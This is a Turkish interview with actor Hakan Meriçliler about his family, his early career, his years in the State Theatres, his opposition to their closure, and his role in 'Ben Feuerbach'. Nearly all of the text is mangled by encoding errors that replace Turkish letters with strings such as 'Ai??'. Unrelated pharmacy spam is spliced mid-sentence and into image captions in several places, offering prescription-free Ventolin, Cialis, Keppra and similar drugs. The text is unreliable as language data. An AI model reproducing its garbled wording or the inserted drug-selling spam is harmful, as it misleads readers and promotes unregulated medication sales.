HAKAN MERAi??Ai??LAi??LER’Ai??N “ARTAi??SL”LAi??KTEN “AKTAi??R”LA?AzE GEAi??Ai??Az SERA?VENAi??

Pınar Erol
0 yorum
HAKAN MERAi??Ai??LAi??LER’Ai??N “ARTAi??SL”LAi??KTEN “AKTAi??R”LA?AzE GEAi??Ai??Az SERA?VENAi??

Slayt 1SinemanAi??n dA?AYsel gerAi??eklerini yaAYamAi??nAi??n iAi??ine taAYAi??yan, genAi??liAYinde Elvis AYarkAi??larAi?? sAi??yleyen; Ai??ello seven; bariton sesi operaya yatkAi??n olsa da Halikarnas BalAi??kAi??Ai??sAi??ai??i??nAi??n ai???TA?nek Ahmetai??? Ai??ykA?sA?nA?n ve BA?dA?ai??i??nA?n sesi olan; babasAi?? gibi ikinci bahara inanmayan; kaderin duvarlarAi??nAi?? sonuna kadar zorlayan; Ai??ok iyi satranAi?? oynayan ama hayatAi??n iAi??inde hamle yapmayAi?? bilmeyen; varlAi??AYAi??nAi?? yA?celtmeyen; yaAYadAi??AYAi??mAi??z hayata ufak tefek tatlar katAi??p Ai??ekip gitmeye inanan; sahne oyunculuAYundan hiAi?? vazgeAi??meyecek olan; enerjik, renkli,samimi, yaAYamAi??n ara sAi??ra kendisine gAi??z kAi??rptAi??AYAi??nAi??n farkAi??nda olan romantik bir ai???aktAi??rai???le tanAi??AYtAi??m.

Biriyle tanAi??AYAi??rsAi??nAi??z, el sAi??kAi??AYAi??rsAi??nAi??z. O an elini sAi??ktAi??AYAi??nAi??z kiAYinin yaAYamAi??nAi??, kimliAYini, kiAYiliAYini, dA?nyasAi??nAi?? bilmezsiniz. Bu ai???ilk merhabaai??? saftAi??r, meraklAi??dAi??r, sorularla doludur. AyrAi??lAi??rken, elini sAi??ktAi??AYAi??nAi??z kiAYiyi bir de yanaklarAi??ndan Ai??pA?yorsanAi??z ve daha konuAYulacak Ai??ok AYey olduAYunu dA?AYA?nA?yorsanAi??z onu tanAi??manAi??n zevkidir yA?zA?nA?zdeki tebessA?mA?n sebebi… Ve ai???hoAYAi??a kalai??? sAi??zcA?AYA? sAi??ylenmemiAYtir henA?z…

Aile geAi??miAYinize baktAi??AYAi??mAi??zda kAi??kleriniz Selanikai??i??e gidiyor. Anneniz Ai??ok iyi piyano Ai??alAi??p AYarkAi?? sAi??ylA?yor ama o dAi??nem Ankara, Cebeciai??i??deki okula gitmesine izin verilmediAYi iAi??in bankacAi?? oluyor. BabanAi??z sanayici. Dedeniz tAi??p Ai??AYrencisiyken mA?badele sonrasAi?? burada baAYtan baAYlamamak iAi??in Ai??zmirai??i??in en iyi kasabAi?? oluyor. Ai??kinci eAYi Eleni anneanneniz. AtatA?rk ile dans etmiAY. AtatA?rk ona: ai???Neden korkuyorsun? Bu bir savaAY deAYil Eleni, dans. Dansta dans edilir, savaAYta savaAYAi??lAi??rai??? diyor. Ai??AYte bu ailenin soyismini alAi??AY hikA?yesi de ilginAi??.
1944 yAi??lAi??nda Alman iAYgalinden sonra Bulgarlar giriyor Yunanistanai??i??a. AsAi??l problem iAYte o an baAYlAi??yor. Almanlar dedemi Ai??ok seviyorlar Ai??A?nkA? Ai??ok dA?rA?st bir adam. Almanlarla iAYbirliAYi yapmAi??yor ama bir biAi??imde onlara yardAi??mcAi?? oluyor. TA?rk ailelerini koruyor. Sonra Bulgar iAYgali olunca anlAi??yorlar ki, barAi??namayacaklar Ai??A?nkA? Bulgarlar Ai??ok kiAYiyi Ai??ldA?rA?yorlar, Ai??ok zulA?m yapAi??yorlar. Dedem de bA?tA?n aileyi topluyor, her AYeyi satAi??yor ve sAi??nAi??ra geliyorlar. A?Ai?? gA?n Ai??nce Ai??nAi??nA? kapAi??larAi?? kapatAi??yor, onlar da iki yAi??l sAi??nAi??rda kalAi??yorlar ve bA?tA?n para orada bitiyor. Bulgar kaptanla sAi??nAi??rAi?? geAi??meye Ai??alAi??AYAi??yorlar. Kaptan, onlarAi?? BulgarlarAi??n olduAYu bAi??lgeye gAi??tA?recekken dedem duruma uyanAi??yor, silahAi?? kaptanAi??n kafasAi??na dayAi??yor ve bizi doAYru rotaya gAi??tA?r diyor. Orada bir arbede yaAYanAi??yor. Sonunda suyu, yani MeriAi?? Nehriai??i??ni geAi??meyi baAYarAi??yorlar. Oradan geliyor MeriAi??liler adAi??.

buy ventolin inhaler no prescription. cialis viagra. HAKAN2

HenA?z 3-4 yaAYlarAi??nda ne olacaksAi??n diye sorulduAYunda ai???artist olacaAYAi??mai??? diyorsunuz. Sonra farkAi??nAi?? Ai??AYrenince onu ai???aktAi??rlA?kai??? olarak dA?zeltiyorsunuz. BabanAi??zAi??n askerliAYinde TekirdaAYai??i??a gidiyorsunuz.Ai??Anneniz masallar anlatAi??yor, siz o masallarAi?? oynuyorsunuz. AslAi??nda masalla baAYlAi??yor yani…
Annem AYahane bir masal anlatAi??cAi??sAi??dAi??r. Bana, ai???Sen normal masallardan sAi??kAi??lAi??yordunai??? derdi. Bu yA?zden yeni masallar A?retmek zorunda kalAi??yordu. Benim sevdiAYim tA?r olan, korku masallarAi?? anlatAi??yordu. O masal anlatAi??rken ben de arkadaAYlarAi??ma, o masallarAi?? canlandAi??rAi??yordum. Ai??zleyenler, benim canlandAi??rmalarAi??mdan korkuyordu. Bir de ai???Ai??mercikai??? filmlerini izlerken ben bu Ai??ocuktan daha iyiyim. Bu film iAYleri nasAi??l yapAi??lAi??r acaba diye dA?AYA?nA?yordum. HayatAi??mda gAi??rdA?AYA?m ilk film, anneannemin beni aAi??Ai??k hava sinemasAi??na gAi??tA?rdA?AYA?nde izlediAYim ai???Mavi Ceketlilerai??? filmidir. Filmde, AmerikalAi?? askerler KAi??zAi??lderilileri Ai??ldA?rA?yorlar ve ben o gA?n karar vermiAYtim: Ben kesin KAi??zAi??lderili tarafAi??ndayAi??m. Antrakta girmeden bir dakika Ai??nce KAi??zAi??lderili reisi aAYAi??r yaralanAi??yor ve bir Ai??adAi??ra taAYAi??nAi??yor. Onun Ai??lmemesi ve mutlaka bulunmasAi?? lazAi??m. Ben mavi ceketlilerden Ai??nce bulmak iAi??in kaAi??Ai??yorum sinemadan. Elimde onu mavi ceketlilere karAYAi?? savunmak iAi??in bir tahta parAi??asAi??, reisi arAi??yorum, onun yerini biliyorum, diyorum. Ne gA?zel bir dA?nya deAYil mi? Beni babamAi??n babasAi?? olan dedem buluyor. ai???Dede, reisi buldum.ai???, diyorum ona. HiAi?? kAi??zmAi??yor bana, anlayAi??AYla karAYAi??lAi??yor.

Ai??zmirai??i??de lise 2ai??i??deyken AYiir okuyorsunuz, hatta AYu an oynadAi??AYAi??nAi??z dizideki (Yalan DA?nya) o replik oradan geliyor: Okulun en gA?zel kAi??zAi?? size ai???sesin bizi Ai??Ai??ldAi??rtAi??yorai??? diyor. SonrasAi??nda tiyatro koluna giriyorsunuzAi?? ve daha ilk yaptAi??AYAi??nAi??z doAYaAi??lamada hocanAi??z size tiyatrocu olmanAi??z gerektiAYiniz sAi??ylA?yor. Ai??zmir DTai??i??den gelen yAi??netmen Metin Oyman size, Ege Aydan ve Mehmet Ali Erbil karAi??AYAi??mAi?? bir oyuncu olduAYunuzu sAi??ylA?yor ve siz onun yAi??nlendirmesiyle konservatuvara giriyorsunuz. Hatta baAYka bAi??lA?m yazmAi??yorsunuz. BilinAi??le seAi??ilmiAY mesleAYiniz. Asla tesadA?fi deAYil.
BaAYka hiAi??bir AYey yapma dedi bana. SAi??navda baAYka bir bAi??lA?m yazmadAi??m bile. O dAi??nem herkesle konuAYuyordum. ai???SakAi??n istemediAYiniz bir bAi??lA?m yazmayAi??n, sevdiAYiniz AYeyi yapAi??n, yoksa mutlu olamazsAi??nAi??z.ai??? diyordum. Orada da Ai??ok enterasan bir AYey var: Ben A?niversite sAi??navAi??nAi?? kazanamadAi??m ilk Ai??nce. Ai??ok Ai??alAi??AYkan bir Ai??AYrenci deAYildim. Ai??SSai??i??ye girdim. Taban puan 105ai??i??ti, bana 104 geldi. Babam: ai???Hani iyiydi, hani kazanAi??yordun?ai??? dedi. ai???Babaai???, dedim, ai???biliyorum, yaptAi??mai???. Ai??Ai??imden bir ses kazandAi??AYAi??mAi?? sAi??ylA?yor. On gA?n sonra gazetede bir aAi??Ai??klama yayAi??nlandAi??. 800 Ai??AYrencinin sAi??nav sonuAi??larAi??nda hata yapAi??lmAi??AY. Eminim ben onlardan biriyim, dedim. 115 puanla kazandAi??AYAi??mAi?? gAi??rdA?m. Sonra babama gururla gAi??sterdim, annem hA?lA? saklar gazeteyi.

Tiyatro bAi??lA?mA?ne devam ederken, sinemaya ilgi duyuyorsunuz. Ai??lk kAi??sa filminiz yaAYamAi??nAi??zAi??n da izdA?AYA?mA? olan ai???Madam Madamaai??? ile 1993ai??i??te Ai??stanbulai??i??da bir Ai??dA?l alAi??yorsunuz. Ai??kinci filminizle NA?rnberg Festivalai??i??inde Ai??zel gAi??sterim Ai??dA?lA? kazanAi??yorsunuz ve Dokuz EylA?l A?niversitesi Sinema BAi??lA?mA? baAYkanAi??ndan teklif geliyor ancakAi?? Ai??zdemir Nutku bAi??lA?m deAYiAYtirmenize izin vermiyor.
Ben o dAi??nem tiyatroda mutlu olmayacaAYAi??mAi?? hissettim. Olaya mekanik girince, sinema bAi??lA?mA?ndeki insanlarAi??n daha mutlu olduAYunu fark ettim. Sinema hocalarAi?? bana: ai???Sen kesin yAi??netmensin. Sende yAi??netmen algAi??sAi?? var.ai??? dediler. Ben kamera arkasAi??na geAi??ince orada kadraja giren AYeyin, aslAi??nda oradaki AYeye hizmet eden bir mal, eAYya olduAYunu gAi??rdA?m. Oysa oyuncu bunu bAi??yle hissetmez; o kendisinin Ai??ok Ai??nemli olduAYunu dA?AYA?nA?r. Maalesef hoca izin vermedi. Benden Ai??ok iyi yAi??netmen olurdu.

HA?lA? olur. Daha Orduai??i??yu film platosu gibi kullanAi??p iAi??inde teleferiklerin olduAYu bir film Ai??ekilecek… Hrant Dink oynanacak… Cem Karaca oynanacak… Belki Al Pacinoai??i??yla karAYAi??lAi??klAi?? baba-oAYul oynanacak…
En bA?yA?k arzum o. Ai??ocukluAYum Alsancakai??i??ta geAi??tiAYi iAi??in Rumlar ve Ermeniai??i??lerle iAi?? iAi??e bA?yA?dA?m. Ben o insanlarAi?? Ai??ok sevdim. OnlarAi??n Ai??oAYunun yemeAYini yedim. Hep beraberdik. AAi??Ai??khava sinemalarAi??nda onlarla beraber aAYladAi??m. Ben o duygulu halkAi?? biliyorum. Hrant Dink AYu yA?zden Ai??ok Ai??nemli: O filmin iAi??inde her AYey var. Bir sanatAi??Ai??nAi??n birinci Ai??devi; halkAi??nAi??n aslAi??nda kim olduAYunu kendi halkAi??na gAi??stermektir. Hani Gogolai??i??un lafAi?? var ya: ai???YA?zA?nA?z aynada Ai??irkin gAi??rA?nA?yorsa, suAi??u aynada aramayAi??n.ai??? diye. Bir de benim ai???MA?fettiAYai???te sAi??ylediAYim bir lafAi?? var: ai???TanrAi?? insanAi?? cezalandAi??rmak isterse Ai??nce aklAi??nAi?? alAi??rmAi??AY.ai??? Azimdi bunu bir hatAi??rlatmak gerekiyor. Rakel Dinkai??i??in mA?thiAY bir konuAYmasAi?? var: ai???EvlatlarAi??ndan, Ai??ocuklarAi??ndan ayrAi??ldAi??n ama topraAYAi??ndan ayrAi??lmadAi??n sevgilim.ai??? diyor. Bunun yA?zA?ne vurulmasAi?? lazAi??m o seyircinin, insanAi??n, buna tanAi??k olan kiAYinin. Ai??Ai??lerinde bir AYeylerin kopmasAi?? gerekiyor. HiAi?? proveke etmeye gerek yok. Yasin Hayalai??i??le baAYlantAi??larAi?? falan o kadar net ki. Yani hiAi??bir AYey yapAi??lmayAi??AYAi??yla ilgili filmi Ai??ekilse yeter. TA?rkiyeai??i??de AYunu fark ediyorum ben: Oyuncuyu iyi tanAi??mak gerekiyor ve oyuncudan bir adAi??m Ai??nde olmak gerekiyor. YurtdAi??AYAi??nda var bAi??yle adamlar. Buradaki yAi??netmenler biraz kast direktAi??rleri gibi. Oyuncuyu Ai??teye taAYAi??yacak yAi??netmenler yok. O konuda ben Ai??ok becerikliyim iAYte. YapacaAYAi??m saltolarla ben o oyuncuyu oraya taAYAi??maktan Ai??ok zevk alAi??rAi??m. Ben o ortak dili, ensembleai??i??Ai?? kurdurtabilirim onlara.

Cheap generic keppra HAKAN3Okul bitince Ai??stanbulai??i??a kamera arkasAi??na geAi??mek iAi??in geliyorsunuz ama Ai??zdemir Nutku, ai???Bir oyun koyuyorum, Trabzonai??i??a gelmelisin, sadece bir oyunluk gel, sonra ne istersen yap, yoksa hakkAi??mAi?? helal etmem.ai??? diyor ve geliAY o geliAY. Ai??lk oyun ai???Oyunun Oyunuai??? yAi??l 1995.
Benim oradan Ai??Ai??kamayacaAYAi??mAi?? biliyordu, onun iAi??in yaptAi?? bu iAYi. Orada oAYlumun annesi Ayla Bakiai??i??yi tanAi??dAi??m. DA?nyanAi??n en AYahane insanAi??dAi??r. En bA?yA?k hediyeyi, oAYlumu verdi bana. HA?lA? da mA?thiAYtir bizim iliAYkimiz Aylaai??i??yla, en yakAi??n arkadaAYAi??mdAi??r.

Ai??lk Ai??nce Trabzonai??i??a geliyorsunuz (1995). Sonra 6 yAi??l geAi??ici gAi??rev ile Ai??stanbulai??i??a gAi??nderiliyorsunuz. Sonra Ankara ve tekrar Trabzon Devlet TiyatrolarAi??. Bir de Sivas DT var. 40ai??i??a yakAi??n oyunun 20ai??i??sinde baAYrolde oynuyorsunuz. Kuruma farklAi?? bir sadakatle baAYlAi??sAi??nAi??z. Devlet TiyatrolarAi?? benim yuvam diyorsunuz Buy cannabidiol cost .
Evet, yuvam gerAi??ekten. Bir de komik anAi??m var bu tayinlerle ilgili: Mine Acar beni Sivasai??i??tan tanAi??r, sever. Vekil mA?dA?rlA?AYA? sAi??rasAi??nda bana Ankaraai??i??yAi?? gezdirirken, Purchase lady era reviews ai???Gel seni Ankaraai??i??nAi??n kralAi?? yapayAi??m.ai??? dediAYinde ai???Ben Ankaraai??i??nAi??n kralAi?? olmaktansa; Ai??stanbulai??i??un prensesi olmayAi?? tercih ederim.ai??? dedim. HA?lA? bu cevabAi??ma AYaAYAi??rAi??yorum. Lemi Hocaai??i??ya (Bilgin) da paroxetine sandoz gewichtstoename. ai???Ankaraai??i??dan beni geldiAYim yere geri gAi??nderin.ai??? dedim.

Devlet TiyatrolarAi??ai??i??nAi??n kapatAi??lmasAi??na ne diyorsunuz? Daha Ai??nce suikast olarak nitelemiAYtiniz. Bu yeni dA?zenlemeyle A?lkede neler yok olur?
GAi??rA?nen o ki yuvam bombalandAi??. 1949ai??i??da kurulmuAY, A?zerinde Ai??ok Ai??alAi??AYAi??lmAi??AY bu sistem varken, hiAi?? bu iAYte terlememiAY, bu iAYte vakit harcamamAi??AY, dAi??AYarAi??dan insanlarAi??n kaAYAi??t A?zerinde organizasyon yapmasAi?? isteniyor. Tabii bunun herhangi biAi??imde baAYarAi??lAi?? olmasAi?? imkA?nsAi??z. Bu yasa tasarAi??sAi??nAi??n realitede karAYAi??lAi??AYAi?? yok. En acAi??sAi?? bugA?ne kadar bu iAYe gAi??nA?l verdiAYimiz tiyatrocu abilerimiz, ablalarAi??mAi??z, kardeAYlerimiz yuvalarAi??ndan men edildiler. Bir daha bAi??yle bir yuva bulamayacaklar ve baAYka bir iAY de yapamayacaklar. Daha vahimi; bir sA?rA? tiyatro okulu, bale okulu, opera, sanat okulunun da artAi??k bir anlamAi?? kalmadAi??. Bu insanlar sAi??rtlarAi??nAi?? yaslayAi??p gA?Ai?? alacaklarAi??, onlarAi?? kucaklayacak bir alandan da mahrum oldular. BirtakAi??m kAi??klA? deAYiAYikliklere ihtiyacAi?? olan Devlet TiyatrolarAi?? sanatAi??Ai??larAi?? Ai??ok bA?yA?k Ai??zveriyle, Ai??ok bA?yA?k iAYler yaptAi??lar TA?rkiyeai??i??de. Tiyatroyu her yere gAi??tA?rmek iAi??in Ai??ok Ai??aba harcadAi??lar. BAi??lge tiyatrolarAi??nAi?? oluAYturdular. Okuma yazmayAi?? sevmeyen bu halk Ai??nemli klasikleri 5 liraya gAi??rmA?AY oldu. Burada dA?nya Ai??apAi??nda gerAi??ekleAYtirilen bir TA?rk mucizesi var. Zaten okuma-yazmayAi?? sevmeyen bu halk, 5 liraya satAi??n aldAi??AYAi?? bu gAi??rgA?yA?, bu bilinci kaybedecek. Ama zaten gAi??rA?nA?yor ki istenen de bu! Bu kuruma kA?r ediyor, zarar ediyor gAi??zA?yle bakAi??labilinir mi? 730 kiAYisi olan bu kurum ne kadar yA?k olabilir ki devlete? Zaten zihniyet bu! Ai??nsan yaAYarken bunu anlamAi??yor. Ama eskiden bAi??yle bir kurum vardAi??, biz AYAi??yle AYAi??yle turneler yapardAi??k diye sadece hatAi??ralarda kalan bir kurumdan bahsetmek Ai??ok acAi?? olacak. Bir de AYu var: Bu iktidar gidecek. Gelenler bir gA?n geldikleri gibi giderler… Ama telafisi olmayan bir yara aAi??arak gidecekler.

Ai??ktidar – sanat Ai??atAi??AYmasAi?? elbette olacak. Tarih boyunca da oldu. Devlet TiyatrolarAi??ai??i??nAi??n geAi??miAYine baktAi??AYAi??mAi??zda, Erbakan 60ai??i??larAi??n ortalarAi??nda ai???Ai??ktidara gelince ilk Ai??nce tiyatrolarAi??, operalarAi?? kapatacaAYAi??zai??? diyor. Sonra da her iktidarAi??n bir meselesi oluyor tiyatro ile. 80ai??i??de yine sanatAi??Ai??larAi??n sAi??zleAYmeleri feshediliyor, emekli ediliyor ya da bAi??lgelere sA?rA?lA?yorlar. Oysa Antik Yunanai??i??da oyuncular komedi anlayAi??AYAi?? iAi??inde AYikA?yetlerini sunarlarmAi??AY. Oraya yAi??neticiler, belediye ya da vali makamAi??ndan kiAYiler gelir ve oyuncularAi??n AYikA?yet ettikleri noktalarAi?? not alAi??r, dA?zeltme yoluna giderlermiAY, deAYil mi?
O dAi??nemin yAi??neticileri SelAi??uk-Efesai??i??te gerAi??ekten dersler Ai??Ai??karAi??p topluma yararlAi?? bir dAi??nA?AYA?m saAYlAi??yorlar bu anlamda. Bu noktada ne diyeceAYimi gerAi??ekten bilemiyorum.

Bu yasa tasarAi??sAi??na gAi??re tiyatronun, opera ve balenin Ai??zel yasalarAi?? kaldAi??rAi??lacak ve sanatAi??Ai??lar 657 sayAi??lAi?? yasaya dahil olup ai???sanatkA?r memurai??? A?nvanAi??yla memurlaAYacak. Tiyatro ve opera binalarAi?? oluAYturulacak Sanat Kurumuai??i??na geAi??ecek. Bu kurul, Bakanlar Kuruluai??i??nun atayacaAYAi?? 11 kiAYiden oluAYacak. Orada da akAi??l insanlarAi??mAi??z olacak. SanatAi??Ai??lar halen gAi??rev yapmakta olduklarAi?? ilin, kA?ltA?r ve turizm mA?dA?rlA?AYA? emrinde gAi??revlendirilmiAY sayAi??lacak. Verilen destekler -ki yA?zde elliyi geAi??meyecek- istenirse geri Ai??ekilebilecek. Erken emeklilik olacak. AtatA?rkai??i??A?n zamanAi??nda hazAi??rlAi??klarAi?? yeterli bulmayAi??p geAi??ici Ai??nlemlerle yapAi??lmaz tiyatro, mutlaka yasasAi?? olmalAi?? dediAYi Devlet TiyatrolarAi??ai??i??nAi??n geldiAYi noktadan bahsediyoruz.
Ne yazAi??k ki Devlet TiyatrolarAi?? kapandAi??. Ai??l KA?ltA?r MA?dA?rlA?kleri bu iAYten ne anlar Allah aAYkAi??na! Bu konuda hiAi??bir fikir sahibi deAYiller. Bu iAY hiAi??bir AYekilde yA?rA?mez.

NA?zAi??mai??i??Ai??n ai???bu kavga bizimai??? demesi gibi. Bu sadece Devlet TiyatrolarAi??ai??i??nAi??n kavgasAi?? deAYil ki! Bu, Azehir TiyatrolarAi??ai??i??nAi??n da, Ai??zel tiyatrolarAi??n da ai???hepimizin kavgasAi??ai???.
Buna AYAi??yle Ai??rnek vermek isterim: Taksim Sahnesiai??i??nde son oynayanlardan biriyim. Ai??etin Tekindorai??i??un yerine geldiAYim ai???MA?fettiAYai???i orada oynamAi??AYtAi??m. Taksim Sahnesiai??i??nin her yerine dokunmuAYumdur. Ben tiyatroda ruhlarAi??n Ai??lA?msA?zlA?AYA?ne inanAi??rAi??m. ai???Hadiai???, derim ai???Abi bugA?n benim yerime sen Ai??Ai??k oyna. Beden benim ama ruh senin olsun gel oynaai???. Ve o gA?n oyun Ai??ok acayip olur. Ben bAi??rakAi??rAi??m yani. Yemin ederim, o gelir oynar. Ben bir gA?n bu oyuna Ayberk Ai??Ai??lokai??i??u davet ettim. Ai??ok istermiAY bu rolA? oynamayAi??. O gA?n onun Ai??lA?m yAi??ldAi??nA?mA?ydA?.Ai?? O gA?n MA?ge GA?rman Ai??ok beAYendi oyunu. Bir daha da Ai??yle bir oyun olmadAi??. Mesela bunu Tomas FasA?lyeciyanai??i??da da yapmAi??AYtAi??m Sivasai??i??ta ve o gA?n dev bir kelebek gelip baAYAi??ma kondu selamda. Azimdi baAYlAi??yorum. BurasAi?? kapatAi??ldAi??AYAi?? zaman kimseden bir ses Ai??Ai??kmadAi??. Kimse itiraz etmedi. Kimse giden AYeyin ardAi??ndan aAYAi??t yakmadAi??. Hemen akabinde, Erkan TaAYdAi??AYen ile konuAYuyoruz, dertleAYiyoruz. ai???Bir gA?n AKM de kapatAi??labilir.ai??? dedi. Elimizden giderse ne yaparAi??z? Ai??A?nkA? tiyatroyu merkezden uzaktaAYtAi??ran bir niyet var ortada. ai???HiAi?? olur mu, kapatAi??lAi??r mAi?? AKM?ai??? dediler. Ai??AYte AKM de kapatAi??ldAi??. Kimse inanmamAi??AYtAi?? o zaman. Bu, bugA?nA?n yenilgisi deAYil aslAi??nda. Ai??oktan yenilinmiAY bir durum var ortada. Benim o duygulanAi??mlarAi??mAi?? Ai??ok romantik buluyorlardAi??. Bunu genAi?? davranAi??AYAi?? olarak nitelendiriyorlardAi??. Ai??oktan iAYdiAY edilmiAY bir durum var. Kimseden de ses Ai??Ai??kmayacak.

ai???Tiyatroyu batAi??rmak iAi??in iktidarlara ihtiyacAi??mAi??z yok, biz kendi kendimize batAi??rabilirizai??? demiAYti yAi??llar Ai??nce IAYAi??l KasapoAYlu. Niye bu suskunluk? Niye tepki gelmiyor?
Sadece sanatAi??Ai??lar deAYil; TA?rk halkAi?? da tepki vermiyor bu anlamda. EleAYtirim herkese. TA?rkler cesur denir. Cesaret olay anAi??nda verilen tepkidedir. Olay anAi??nda reaksiyon verdik ve sonuAi??larAi??nAi?? da aldAi??k tarihte ama artAi??k olaylardan sonra reaksiyon vermeye alAi??AYtAi??k. Ai??nsanlar artAi??k gA?nA? yaAYadAi??klarAi?? iAi??in, gA?nA? kaybetmek istemiyor. ai???O kadar kolay deAYil.ai??? diye cA?mle var ama ne geldiyse baAYAi??mAi??za o cA?mleden geldi.

ai???OynadAi??AYAi??m her akAYam arAi??ndAi??AYAi??mAi?? hissediyorum. Kirlerimin A?zerimden aktAi??AYAi??nAi?? gAi??rA?yorum, parladAi??AYAi??mAi?? hissediyorum.ai??? diyen; oyunculuAYu ustalaAYmAi??AY bir masumiyet diye tanAi??mlayan; seyirciyle sAi??cak diyaloAYu seven; partnerini her zaman yA?celten, kutlayan, ai???sayende daha iyi bir oyun oynadAi??kai??? diyen bir oyunculuk desturundaki aktAi??rA?n, aktAi??rA? oynamasAi?? nasAi??l bir AYey?
GeAi??en gA?n Lemi Hocaai??i??yla (Bilgin) konuAYuyorduk bunu. Dedim ki: ai???Hocam, bizde birbirini Ai??vmek yoktur. Ben bunu kAi??rmak istiyorum.ai??? Ben her iyi oyun sonrasAi??nda partnerime kesinlikle bunu sAi??ylerim. Ben bunu Ai??ok deAYerli bulurum. Bizde hep kAi??tA?yA? sAi??yleme alAi??AYkanlAi??AYAi?? var. Bu son oyunda hem sanatAi??Ai??lar hem teknik ekip nasAi??l oyunun arkasAi??ndalar anlatamam. Ai??ok tatlAi?? 87 oyun oynadAi??m. AktAi??rA?n, aktAi??rA? oynamasAi?? ise Ai??ok acayip, Ai??ok ters bir AYey. Ben AYahsen bu adamAi??, Feuerbachai??i??Ai?? Ai??ok sevdim. AdAi??nAi??n TA?rkAi??e anlamAi??: Akan nehir. Benim de soyadAi??m MeriAi??liler ya, Ai??ok benzeAYen AYey var. BA?yA?k bir aAYkla oynuyorum bu adamAi??. Bunu en iyi farkedenlerden biridir Metin Belgin. Bir gA?n izlemeye gelmiAY oyunu. Oyundan Ai??Ai??ktAi??k, AYoktaydAi??. A?Ai?? saat sonra beni aradAi??: ai???Hakan, hA?lA? oyunun iAi??indeyim. Sen yeteneklisin bilirdim ama bu oyunu nasAi??l oynuyorsun Ai??yle ya!ai??? dedi. Bir AYeyi iyi oynamak bir AYeydir ama Ai??ok inanarak oynamak baAYka bir AYeydir. Trabzonda 70 yaAYlarAi??nda bir seyirci kafasAi??nAi?? Ai??AYAi??AYa kadar getirmiAY oyunu izliyor endiAYeyle. Benim hasta olduAYumu itiraf ettiAYim bir yer var. ai???Ben hasta mAi?? dedim, dedim mi?ai??? dediAYimde ai???Dedin be evladAi??m, maalesef dedin.ai??? dedi. Buna bayAi??lAi??yorum iAYte ben. Seyirciyi oraya getirmek lazAi??m. Ama bunun da bir nedeni var, ben mesela asla teknik oynamayAi?? beceremedim. Denedim de yapamadAi??m. HA?crelerim varsAi??n Ai??lsA?n, deAYer derim.

ai???Ben Feuerbachai??? (2011), ai???SavaAY Ai??kinci Perdede Ai??Ai??kacakai??? (2007), ai???Sersem KocanAi??n Kurnaz KarAi??sAi??ai??? (2004) oyunlarAi??nda ve AYu an oynadAi??AYAi??nAi??z ai???Yalan DA?nyaai??? dizisinde aktAi??rA? canlandAi??rAi??yorsunuz. KAi??smetiniz hep aktAi??rlA?kten yana. Bu son iki oyunun benzerlikleri kadar ayrAi??AYtAi??klarAi?? yerler de var. Ai??ek yazar Oldrich Danekai??i??in ai???SavaAY Ai??kinci Perdede Ai??Ai??kacakai??? isimli oyunda Vladimir Bendl tiyatro iAi??in neredeyse anasAi??nAi?? satacak bir karakter. Orada aktAi??rA?n anAi??larAi?? A?zerinden tiyatro sanatAi??nAi??n gA?cA? ve bA?yA?sA?ne gAi??nderme var. Tankred Dorstai??i??un 1986ai??i??da yazdAi??AYAi?? ai???Ben Feuerbachai???da ise ciddi bir sistem eleAYtirisi var. AdamAi??n delirmesinin nedeni etrafAi??nda hayal gA?cA? sAi??fAi??r olan, duyarsAi??z insanlarAi??n olmasAi??ai??i??
Vladimi Bendl ne AYekilde olursa olsun ama tiyatro yapsAi??n. O tiyatroya aAYAi??k. Onun tek derdi perde aAi??Ai??lsAi??n. Ne karAi??sAi?? umrunda, ne sevgilisi, ne arkadaAYlarAi??. Her AYeyi satar o, yeter ki tiyatro yapsAi??n. Feuerbach ise mA?thiAY tutkulu bir aktAi??r. Feuerbachai??i??Ai??n derdi Ai??zgA?n, gerAi??ek, dA?rA?st, salt tiyatro yapmak ve bunun iAi??in dibine kadar gidebilmek. Onun deAYerleri Ai??ok yA?ksek. Ben her ikisi de deAYilim maalesef. Tiyatroyu ne Bendl kadar sevebildim ne Feuerbach kadar tutkunu olabildim. Ben sadece bu kahramanlarAi??n peAYinden gidip ne yaptAi??klarAi??nAi?? gAi??zlemleyebildim. Yoksa bu iAYi yapmak neden anlamlAi?? olabilir ki? Bu, yaAYama benzer; Ai??teki tA?rlA? memuriyet gerAi??ekten. Her akAYam onun peAYine dA?AYmek Ai??ok zevkli geliyor bana.Ustam Cemil Ai??zbayer sAi??ylemiAYti: ai???UstalaAYtAi??AYAi??n zaman, kendini aynAi?? anda yukardan, yandan, dAi??AYardan izleyeceksin ve tam oynarken AYu hareketi dA?n daha iyi yaptAi??m diyeceksin.ai??? demiAYti. O zaman, bu nasAi??l olur demiAYtim ama bugA?n kendimi onun dediAYi gibi buldum. Oyuncunun, kendini her yAi??nden denetleyebilmesi, kendini seyirciden ayAi??rmadan, onunla birlikte seyretme hali ustalaAYmanAi??n baAYlangAi??cAi?? oluyor.

Feuerbach iki tarihi kiAYilikten yaratAi??lmAi??AY. Torquato Tasso ve Aziz Francesko. Feuerbachai??i??Ai??n hastaneye yatmadan Ai??nceki son oyunuTasso. Sahnelere geri dAi??nA?AY iAi??in seAi??tiAYi oyunun da Ai??yle. Aziz Francesko, tek AYiiri olan ai???Cantinum Solisai??i??te topraAYa, ateAYe, havaya ve suya bir TanrAi?? Ai??vgA?sA? dA?zA?yor.
Francesko gerAi??ekten kuAYlarla konuAYuyor. AslAi??nda hAi??ristiyanlAi??k dinini en doAYru yaAYayanlardan. ai???Din adamlarAi??nAi??n mekA?na ihtiyacAi?? yok. GittiAYin her yerde din yapabilirsin.ai??? diyor. ZenginleAYmeye, kurumsallaAYmaya gerek yok, Ai??Ai??plak ayakla her yere dini yayabilirsin diyen bir derviAY aslAi??nda. BaAYAi??msAi??zlAi??k ilan etmiAY. O anlamda Feuerbach da derviAY, oyuncu derviAY.

mail order pharmacy. HAKAN4

Feuerbach, ai???oyuncu olmasAi??nAi?? bA?tA?n hayatAi?? ile Ai??dediAYiniai??? sAi??yler ve bunda sonsuz bir adanmAi??AYlAi??k vardAi??r. Ama sorar: ai???Kime oynuyoruz biz oyunlarAi???ai??? Feuerbachai??i??laAYmAi??AY aktAi??rler var mAi??? DA?zleAYtirilmek istemediAYi iAi??in, ruhu hastalanan oyuncular var mAi???
